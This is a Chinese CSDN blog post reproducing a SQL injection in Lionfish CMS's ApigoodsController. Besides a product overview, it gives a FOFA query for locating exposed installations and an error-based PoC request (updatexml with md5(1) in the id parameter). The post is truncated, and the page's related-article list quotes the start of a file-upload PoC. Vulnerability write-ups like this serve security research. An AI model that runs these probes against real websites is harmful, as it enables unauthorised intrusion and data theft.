【漏洞复现】狮子鱼CMS某SQL注入漏洞01

已于 2024-02-09 14:05:36 修改
阅读量1.2k 收藏 7
点赞数 10
CC 4.0 BY-SA版权
文章标签: 安全 服务器 web安全 网络
于 2024-02-09 09:18:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136084955
【漏洞复现】 专栏收录该内容
150 篇文章

已下架不支持订阅

Nx01 产品简介

        狮子鱼CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

        狮子鱼CMS存在一个安全漏洞,即ApigoodsController.class.php参数过滤不严谨,这可能导致SQL注入漏洞。这意味着攻击者可能通过特定的输入来操纵SQL查询,从而获取敏感信息或执行恶意操作。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC:

GET /index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1) HTTP/1.1
Host: {
  
  {Hostname}}
Content-Type: ap
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
专栏目录

已下架不支持订阅

漏洞复现狮子CMSSQL注入漏洞
晚风不及你
02-09 1731
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
【1day】狮子CMS注入漏洞学习(2个)
记录并分享学习安全的知识点..
07-07 1364
狮子CMS注入漏洞学习
狮子cms-sql注入漏洞复现
weixin_68647219的博客
09-06 3278
工作发现,狮子cms存在sql注入漏洞,该漏洞是由于狮子CMS ApiController.class.php 参数过滤存在不严谨可能导致SQL注入漏洞
狮子 CMS ApiController.class.php SQL 注入漏洞
最新发布
网安小白
08-04 363
本章提供的所有内容仅供学习、交流和分享用途,只供参考。本站资源禁止并谢绝未经本站许可的使用,如若欲转载,请署名以及注明出处,请务必以文字链接的形式标明或保留文章原始出处和作者的信息。本站(原创)文章、资源、图片等所有内容,一经转载,即表示您已经接受上述声明!需自行承担一切风险与责任; 漏洞描述 狮子 CMS ApiController.class.php 参数过滤存在不严谨,导致 SQL 注入漏洞 漏洞影响 狮子CMS FOFA "/seller.php?s=/Public/login"
[漏洞挖掘]SRC-狮子CMS-SQL注入
wwxxee
05-20 7907
狮子cms-SQL注入 狮子CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url /
漏洞复现狮子CMS文件上传漏洞(image_upload.php)
晚风不及你
02-11 1929
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
漏洞复现狮子CMS文件上传漏洞(wxapp.php)
晚风不及你
02-11 1731
狮子CMS(Content Management System)是一种网站管理系统,它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面,网站所有者可以方便地进行内容的发布、管理和布局。
狮子社区团购系统CMS任意文件2处上传漏洞
赵一舟的博客
06-09 3814
漏洞复现 FOFA语句 "/seller.php?s=/Public/login" POC1 POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 213 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: mul.
poc-狮子cms
m0_55772907的博客
10-19 931
渗透
狮子SQL注入漏洞复现
花开烟雨楼的博客
03-23 1666
狮子CMS是一款管理系统。在 ApiController.class.php处 参数过滤存在不严谨,导致SQL注入漏洞
电信OSS规划 2.8_3.系统蓝图
02-28
电信 OSS规划 系统蓝图 电信业务支撑规划之一,内容详见
SIYUCMS V6.0 快速开发内容管理系统
05-08
SIYUCMS V6.0 基于最新版本的ThinkPHP 6.0.0RC2 框架开发,后台前端框架采用AdminLTE。系统的核心理念就是“ 做最适合企业的CMS ”。 权限系统、会员系统、管理员日志、内容管理、栏目管理、数据库备份恢复、模板管理、文件管理、短信发送、邮件发送等想你所想,也许是最适合学习和应用的CMS系统。 ThinkPHP6.0即将正式发布,也许这是一个学习的好例子。 演示帐号:test 演示密码:123456
漏洞复现狮子任意文件上传漏洞
失心少年
12-05 1184
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!它具有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。此外,狮子CMS还具有强大的模板和主题系统,用户可以根据自己的需求和喜好选择合适的模板和主题来定制网站的外观和风格。该上传点位返回上传文件名及路径,大家可自行本地搭建,尝试获取上传的文件路径。
狮子社区团购系统团长推广二维码不显示,以及选择地址失败的解决方案
美奇软件开发工作室
05-17 2732
导读: 狮子社区团购系统是一个开源免费的程序,自带微信小程序端和thinkphp后端,是个相当不错的团购系统。这套系统程序没有完整的使用教程,所以很多小白和我一样,只能自行研究,这过程中难免会出现很多问题,还以为是代码bug,实际上只是因为没有配置好,不懂使用。下面分享一下我遇到的问题,以及解决方法! 问题一: 后台团长推广二维码不显示,微信小程序提货码不显示 刚开始我以为是上传图片功能有问题,小程序码没有上传到后台,后面研究了代码,发现小程序的二维码是通过微信小程序自带接口自动生成的,而这个接口
基于siyucms的信息系统开发(四)验证器更新滞后的问题
好奇阿弟的博客
12-29 321
如上图所示,在使用siyucms做表单提交的时候,明明没有“状态”字段,也不存在必填项目,但是在提交的时候却提示“状态”不能为空。经过排查,发现这个系统在每个模块生成的时候,都会生成一个“验证器”: 在表单提交的时候,会先经过验证器进行验证: 顺藤摸瓜找到验证器,发现验证器的规则如下: 原来,最初在模块建立的时候默认生成了“状态”字段,验证器也自动添加了该字段的验证规则。在删除该字段后,验证器并不能自动更新,因此有三种办法能够解决该问题: 1.手动修改验证器规则,删掉对“状态”...
漏洞挖掘 SRC刷分之一招上榜!
jennycisp的博客
05-25 1215
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
CatfishCMS任意命令执行导致getshell
云雕的博客
06-08 5267
CatfishCMS任意命令执行导致getshell目录一、 漏洞说明二、 漏洞测试三、漏洞修复: 目录 测试环境:windows + php5.4.45 +apache (phpStudy 集成环境) CMS 版本: v4.8.54(发布于2019年1月) 一、 漏洞说明 完整的payload为: s=dir&_method=__construct&method=*&fi...
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 4387
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
CMS系统漏洞分析溯源
weixin_47493074的博客
10-01 413
CMS系统漏洞分析溯源(第8题)
狮子社区团购小程序v17.7
07-02
狮子社区团购小程序v17.7是一款功能强大、便捷实用的团购平台。此小程序通过与社区居民的绑定,为用户提供了丰富的社区生活服务。 首先,狮子社区团购小程序v17.7具有便捷的购物功能。用户可以通过小程序直接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值